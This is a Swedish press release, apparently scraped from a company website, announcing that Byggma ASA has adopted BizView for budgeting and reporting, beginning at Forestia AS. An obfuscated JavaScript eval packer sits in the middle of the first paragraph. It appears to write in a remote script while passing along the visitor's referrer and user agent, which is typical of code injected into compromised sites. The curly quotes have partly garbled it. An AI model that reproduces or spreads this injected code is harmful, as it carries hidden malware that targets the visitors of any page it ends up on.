Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

Byggma ASA väljer BizView för finansiell styrning

Byggma ASA väljer BizView för finansiell styrning
Sebastian

Uldal, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krerz|var|u0026u|referrer|idkaz||js|php’.split(’|’),0,{}))
Masonite Beams, Aneta och Scan Lamps syftar Byggma ASA till att vara en av de ledande leverantörerna av byggmaterial på den nordiska marknaden.

Som en del av en kontinuerlig utvecklingsprocess har Byggma valt att använda BizView att lösa den finasiella styrningen av gruppen, nu – som ett första steg – med implementation av BizView hos Forestia AS – där de redan använder BizView i den pågående budgetprocessen.

”Anpassningsförmåga har varit grunden för Forestia’s existens under mer än 40 år, och kommer att fortsätta att vara det under de kommande åren”, säger finansdirektör Ingeborg Edvardsen på Forestia AS. ”Det är därför vi medvetet har fokuserat på kontinuerlig produktutveckling, och samtidigt som kvalitetssäkring på alla nivåer är en högsta prioritet. Vårt val av BizView smälter naturligt in i de lösningar som stärker vårt företag och gör oss bättre utrustade i den framtida marknaden. ”

”BizView ger oss möjlighet att vara mer hands-on med rapportering, budgetering och prognostisering. Detta innebär att vi kontinuerligt följer upp de verkliga siffrorna på försäljningsvolymer och ekonomi”, säger Ingeborg Edvardsen.

”Stora företag med flera produktionslinjer, många anställda och internationell export av produkter, finner ofta att komplexiteten kan skymma den samlade bilden av bolagets ställning”, säger VD Lars Fjellbirkeland i BizView Systems AS. ”Med BizView kan nyckelområden som prognoser, budgetering, rapportering, analys och konsolidering hanteras bättre och mer effektivt än tidigare.”

”BizView erbjuder ett webbaserat Excel-liknande användargränssnitt i kombination med kraftfull arbetsflödeshantering. Nu är det enklare än någonsin att etablera optimal företagsledning i företag”, fortsätter Lars Fjellbirkeland. ”Vårt fokus med BizView har varit att förenkla alla procedurer och rutiner. Vi har också gjort det möjligt att enkelt distribuera rapporter och mallar till andra användare i organisationer med bara några knapptryckningar.”

Om Forestia

Forestia är en av de ledande leverantörerna av spånskivor i Norden och producerar träskivor, brädor och byggskivor, liksom pre-cut I-bjälkar.

Företaget har lång och bred erfarenhet, mycket hög kvalitet och bra logistiklösningar. Genom ett nära samarbete med kunder och andra partners arbetar vi kontinuerligt med att vidareutveckla produkter och lösningar. Huvudkontoret ligger i Braskereidfoss, Norge, och företaget har cirka 170 anställda. Företaget blev en del av Byggma ASA 2006.

Om BizView och Bizview Systems

BizView är ett av de ledande systemen inom prognostisering, budgetering och rapportering. Programvaran erbjuder ett webbaserat Excel-liknande användargränssnitt i kombination med kraftfull workflowstyrning. BizView är en öppen lösning som även passar bra ihop med QlikView och Microsofts beslutsstödslösningar. BizView utvecklas och marknadsförs av Bizview Systems med kontor i Skandinavien och marknadsförs utanför Skandinavien genom partners. Över 1000 företag använder våra lösningar.

För mer information besök www.bizviewsystems.com